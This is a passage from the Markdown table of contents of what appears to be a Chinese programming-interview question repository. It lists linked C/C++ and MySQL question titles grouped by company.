简述strcpy、sprintf与memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#211%E7%AE%80%E8%BF%B0strcpysprintf%E4%B8%8Ememcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.2.8 编码实现某一变量某位清0或置1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#212%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E6%9F%90%E4%B8%80%E5%8F%98%E9%87%8F%E6%9F%90%E4%BD%8D%E6%B8%850%E6%88%96%E7%BD%AE1) ##### [5.2.9 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#213%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [5.3.0 分别写出BOOL,int,float,指针类型的变量a 与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#214%E5%88%86%E5%88%AB%E5%86%99%E5%87%BAboolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8Fa-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [5.3.1 局部变量全局变量的问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#215%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E7%9A%84%E9%97%AE%E9%A2%98) ##### [5.3.2 数组和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#216%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.3.3 C++如何阻止一个类被实例化?一般在什么时候将构造函数声明为private?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#217c%E5%A6%82%E4%BD%95%E9%98%BB%E6%AD%A2%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%A2%AB%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E8%88%AC%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%B0%86%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%A3%B0%E6%98%8E%E4%B8%BAprivate) ##### [5.3.4 如何禁止自动生成拷贝构造函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#218%E5%A6%82%E4%BD%95%E7%A6%81%E6%AD%A2%E8%87%AA%E5%8A%A8%E7%94%9F%E6%88%90%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.3.5 assert与NDEBUGE](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#219assert%E4%B8%8Endebuge) ##### [5.3.6 Denug和release的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#220denug%E5%92%8Crelease%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.3.7 main函数有没有返回值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#221main%E5%87%BD%E6%95%B0%E6%9C%89%E6%B2%A1%E6%9C%89%E8%BF%94%E5%9B%9E%E5%80%BC) ##### [5.3.8 写一个比较大小的模板函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#222%E5%86%99%E4%B8%80%E4%B8%AA%E6%AF%94%E8%BE%83%E5%A4%A7%E5%B0%8F%E7%9A%84%E6%A8%A1%E6%9D%BF%E5%87%BD%E6%95%B0) ##### [5.3.9 c++怎么实现一个函数先于main函数运行](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#223c%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E5%85%88%E4%BA%8Emain%E5%87%BD%E6%95%B0%E8%BF%90%E8%A1%8C) ##### [5.4.0 虚函数与纯虚函数的区别在于](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#224%E8%99%9A%E5%87%BD%E6%95%B0%E4%B8%8E%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%9C%A8%E4%BA%8E) ##### [5.4.1 智能指针怎么用?智能指针出现循环引用怎么解决?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#225%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E6%80%8E%E4%B9%88%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E5%87%BA%E7%8E%B0%E5%BE%AA%E7%8E%AF%E5%BC%95%E7%94%A8%E6%80%8E%E4%B9%88%E8%A7%A3%E5%86%B3) ##### [5.4.2 strcpy函数和strncpy函数的区别?哪个函数更安全?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#226strcpy%E5%87%BD%E6%95%B0%E5%92%8Cstrncpy%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%93%AA%E4%B8%AA%E5%87%BD%E6%95%B0%E6%9B%B4%E5%AE%89%E5%85%A8) ##### [5.4.3 为什么要用static_cast转换而不用c语言中的转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#227%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E7%94%A8static_cast%E8%BD%AC%E6%8D%A2%E8%80%8C%E4%B8%8D%E7%94%A8c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E8%BD%AC%E6%8D%A2) ##### [5.4.4 成员函数里memset(this,0,sizeof(*this))会发生什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#228%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E9%87%8Cmemsetthis0sizeofthis%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88) ##### [5.4.5 方法调用的原理(栈,汇编)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#229%E6%96%B9%E6%B3%95%E8%B0%83%E7%94%A8%E7%9A%84%E5%8E%9F%E7%90%86%E6%A0%88%E6%B1%87%E7%BC%96) ##### [5.4.6 回调函数的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#231%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [随机数的生成](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#232%E9%9A%8F%E6%9C%BA%E6%95%B0%E7%9A%84%E7%94%9F%E6%88%90) ##### [5.4.8 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#233%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [5.4.9 请简述#ifdef、#else、#endif、和#ifndef的作用是?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#234%E8%AF%B7%E7%AE%80%E8%BF%B0ifdefelseendif%E5%92%8Cifndef%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF) <br> <h3 id="6">头条篇</h3> --- ##### [6.1.0 请写出int、bool、float、指针变量与"零值"比较的if语句?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#235%E8%AF%B7%E5%86%99%E5%87%BAintboolfloat%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [6.1.1 结构体是否可以直接赋值?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#236%E7%BB%93%E6%9E%84%E4%BD%93%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E8%B5%8B%E5%80%BC) ##### [6.1.2 sizeof和strlen的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#237sizeof%E5%92%8Cstrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.1.3 C语言和C++语言中的关键字static有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#238c%E8%AF%AD%E8%A8%80%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97static%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.1.4 C语言的malloc和C++中的new有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#239c%E8%AF%AD%E8%A8%80%E7%9A%84malloc%E5%92%8Cc%E4%B8%AD%E7%9A%84new%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.1.5 请写一个标准宏MIN?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#240%E8%AF%B7%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin) ##### [6.1.6 ++i和i++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#241i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.1.7 关键字volatile有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#242%E5%85%B3%E9%94%AE%E5%AD%97volatile%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [6.1.8 一个参数可以既是const又是volatile吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#243%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%97%A2%E6%98%AFconst%E5%8F%88%E6%98%AFvolatile%E5%90%97) ##### [6.1.9 *a和&a有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#244a%E5%92%8Ca%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.0 用C语言编写一个死循环程序?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#245%E7%94%A8c%E8%AF%AD%E8%A8%80%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [6.2.1 全局变量和局部变量有什么区别?是怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#247%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [6.2.2 请简述C/C++程序编译的内存分配情况?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#248%E8%AF%B7%E7%AE%80%E8%BF%B0cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [6.2.3 请简述strcpy、sprintf和memcpy的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#249%E8%AF%B7%E7%AE%80%E8%BF%B0strcpysprintf%E5%92%8Cmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.2.4 请解释((void ()())0)()的含义?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#250%E8%AF%B7%E8%A7%A3%E9%87%8Avoid-0%E7%9A%84%E5%90%AB%E4%B9%89) ##### [6.2.5 C语言的指针和引用和C++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#251c%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.6 typedef和define有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#252typedef%E5%92%8Cdefine%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.7 指针常量和常量指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#253%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E5%92%8C%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.8 请简述队列和栈的异同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#254%E8%AF%B7%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [6.2.9 如何设置地址为0x67a9的整型变量的值为0xaa66?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#255%E5%A6%82%E4%BD%95%E8%AE%BE%E7%BD%AE%E5%9C%B0%E5%9D%80%E4%B8%BA0x67a9%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA0xaa66) ##### [6.3.0 请编程实现字符串转换为数字?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#256%E8%AF%B7%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E6%8D%A2%E4%B8%BA%E6%95%B0%E5%AD%97) ##### [6.3.1 C语言的结构体和C++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#257c%E8%AF%AD%E8%A8%80%E7%9A%84%E7%BB%93%E6%9E%84%E4%BD%93%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.3.2 简述指针常量与常量指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#258%E7%AE%80%E8%BF%B0%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E4%B8%8E%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.3.3 如何避免"野指针"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#259%E5%A6%82%E4%BD%95%E9%81%BF%E5%85%8D%E9%87%8E%E6%8C%87%E9%92%88) ##### [6.3.4 句柄和指针的区别和联系是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#260%E5%8F%A5%E6%9F%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.5 new/delete与malloc/free的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#261newdelete%E4%B8%8Emallocfree%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.6 请说一说extern "C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#262%E8%AF%B7%E8%AF%B4%E4%B8%80%E8%AF%B4extern-c) ##### [6.3.7 请说一说C++中struct和class的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#263%E8%AF%B7%E8%AF%B4%E4%B8%80%E8%AF%B4c%E4%B8%ADstruct%E5%92%8Cclass%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.8 new、delete、malloc、free关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#264newdeletemallocfree%E5%85%B3%E7%B3%BB) ##### [6.3.9 delete与 delete []区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#265delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [6.4.0 C++有哪些性质(面向对象特点)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#266c%E6%9C%89%E5%93%AA%E4%BA%9B%E6%80%A7%E8%B4%A8%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%89%B9%E7%82%B9) ##### [6.4.1 子类析构时要调用父类的析构函数吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#267%E5%AD%90%E7%B1%BB%E6%9E%90%E6%9E%84%E6%97%B6%E8%A6%81%E8%B0%83%E7%94%A8%E7%88%B6%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%90%97) ##### [6.4.2 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#268%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [6.4.3 求下面函数的返回值(微软)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#269%E6%B1%82%E4%B8%8B%E9%9D%A2%E5%87%BD%E6%95%B0%E7%9A%84%E8%BF%94%E5%9B%9E%E5%80%BC%E5%BE%AE%E8%BD%AF) ##### [6.4.4 什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#270%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [6.4.5 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#271%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [6.4.6 在什么时候需要使用“常引用”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#272%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8%E5%B8%B8%E5%BC%95%E7%94%A8) ##### [6.5.0 结构与联合有和区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#273%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [6.5.1 试写出程序结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#274%E8%AF%95%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E7%BB%93%E6%9E%9C) ##### [6.5.2 重载(overload)和重写(overried,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#275%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.5.3 有哪几种情况只能用intialization list 而不能用assignment?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#276%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E5%8F%AA%E8%83%BD%E7%94%A8intialization-list-%E8%80%8C%E4%B8%8D%E8%83%BD%E7%94%A8assignment) <h3 id="7">滴滴篇</h3> --- ##### [7.1.0 C++是不是类型安全的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#277-c%E6%98%AF%E4%B8%8D%E6%98%AF%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E7%9A%84) ##### [7.1.1 main 函数执行以前,还会执行什么代码?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#278-main-%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C%E4%BB%A5%E5%89%8D%E8%BF%98%E4%BC%9A%E6%89%A7%E8%A1%8C%E4%BB%80%E4%B9%88%E4%BB%A3%E7%A0%81) ##### [7.1.2 描述内存分配方式以及它们的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#279-%E6%8F%8F%E8%BF%B0%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E4%BB%A5%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [7.1.3 分别写出BOOL,int,float,指针类型的变量a 与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#280%E5%88%86%E5%88%AB%E5%86%99%E5%87%BAboolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8Fa-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [7.1.4 请说出const与#define 相比,有何优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#281%E8%AF%B7%E8%AF%B4%E5%87%BAconst%E4%B8%8Edefine-%E7%9B%B8%E6%AF%94%E6%9C%89%E4%BD%95%E4%BC%98%E7%82%B9) ##### [7.1.5 简述数组与指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#282%E7%AE%80%E8%BF%B0%E6%95%B0%E7%BB%84%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [7.1.6 int (*s[10])(int) 表示的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#283-int-s10int-%E8%A1%A8%E7%A4%BA%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [7.1.7 栈内存与文字常量区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#284%E6%A0%88%E5%86%85%E5%AD%98%E4%B8%8E%E6%96%87%E5%AD%97%E5%B8%B8%E9%87%8F%E5%8C%BA) ##### [7.1.8 将程序跳转到指定内存地址](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#285%E5%B0%86%E7%A8%8B%E5%BA%8F%E8%B7%B3%E8%BD%AC%E5%88%B0%E6%8C%87%E5%AE%9A%E5%86%85%E5%AD%98%E5%9C%B0%E5%9D%80) ##### [7.1.9 int id[sizeof(unsigned long)];这个对吗?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#286int-idsizeofunsigned-long%E8%BF%99%E4%B8%AA%E5%AF%B9%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [7.2.0 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#287%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [7.2.1 const 与 #define 的比较 ,const有什么优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#288const-%E4%B8%8E-define-%E7%9A%84%E6%AF%94%E8%BE%83-const%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9) <br> <h3 id="8">京东篇</h3> --- ##### [8.1.0 内存的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#289%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [8.1.1 基类的析构函数不是虚函数,会带来什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#290%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%8D%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0%E4%BC%9A%E5%B8%A6%E6%9D%A5%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [8.1.2 全局变量和局部变量有什么区别?是怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#291%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [8.1.3 const关键字(反义词mutable)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#292-const%E5%85%B3%E9%94%AE%E5%AD%97%E5%8F%8D%E4%B9%89%E8%AF%8Dmutable) ##### [8.1.4 static关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#293-static%E5%85%B3%E9%94%AE%E5%AD%97) ##### [8.1.5 extern关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#294-extern%E5%85%B3%E9%94%AE%E5%AD%97) ##### [8.1.6 指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#295-%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [8.1.7 explicit是干什么用的 ?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#296explicit%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8%E7%9A%84-) ##### [8.1.8 浅拷贝与深拷贝?为什么要使用深拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#299-%E6%B5%85%E6%8B%B7%E8%B4%9D%E4%B8%8E%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E4%BD%BF%E7%94%A8%E6%B7%B1%E6%8B%B7%E8%B4%9D) ##### [8.1.9 深入谈谈堆和栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#300%E6%B7%B1%E5%85%A5%E8%B0%88%E8%B0%88%E5%A0%86%E5%92%8C%E6%A0%88) ##### [8.2.0 内存的静态分配和动态分配的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#301%E5%86%85%E5%AD%98%E7%9A%84%E9%9D%99%E6%80%81%E5%88%86%E9%85%8D%E5%92%8C%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [8.2.1 什么是继承?什么是多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#303-%E4%BB%80%E4%B9%88%E6%98%AF%E7%BB%A7%E6%89%BF%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81) ##### [8.2.2 虚函数与纯虚函数的区别?含有纯虚函数的类叫什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#306-%E8%99%9A%E5%87%BD%E6%95%B0%E4%B8%8E%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%90%AB%E6%9C%89%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E7%B1%BB%E5%8F%AB%E4%BB%80%E4%B9%88) <br> <h3 id="9">mysql篇</h3> --- ##### [9.1.0 主键 超键 候选键 外键](09.MySQL篇/9.1.0%20%E4%B8%BB%E9%94%AE%20%E8%B6%85%E9%94%AE%20%E5%80%99%E9%80%89%E9%94%AE%20%E5%A4%96%E9%94%AE.md) ##### [9.1.1 数据库事务的四个特性及含义](09.MySQL篇/9.1.1%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BA%8B%E5%8A%A1%E7%9A%84%E5%9B%9B%E4%B8%AA%E7%89%B9%E6%80%A7%E5%8F%8A%E5%90%AB%E4%B9%89.md) ##### [9.1.2 视图的作用,视图可以更改么?](09.MySQL篇/9.1.2%20%E8%A7%86%E5%9B%BE%E7%9A%84%E4%BD%9C%E7%94%A8%EF%BC%8C%E8%A7%86%E5%9B%BE%E5%8F%AF%E4%BB%A5%E6%9B%B4%E6%94%B9%E4%B9%88%EF%BC%9F.md) ##### [9.1.3 drop,delete与truncate的区别](09.MySQL篇/9.1.3%20drop%2Cdelete%E4%B8%8Etruncate%E7%9A%84%E5%8C%BA%E5%88%AB.md) ##### [9.1.4 索引的工作原理及其种类](09.MySQL篇/9.1.4%20%E7%B4%A2%E5%BC%95%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%E5%8F%8A%E5%85%B6%E7%A7%8D%E7%B1%BB.md) ##### [9.1.5 连接的种类](09.MySQL篇/9.1.5%20%E8%BF%9E%E6%8E%A5%E7%9A%84%E7%A7%8D%E7%B1%BB.md) ##### [9.1.6 数据库范式](09.MySQL篇/9.1.6%20%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8C%83%E5%BC%8F.md) ##### [9.1.7 数据库优化的思路](09.MySQL篇/9.1.7%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BC%98%E5%8C%96%E7%9A%84%E6%80%9D%E8%B7%AF.md) ##### [9.1.8 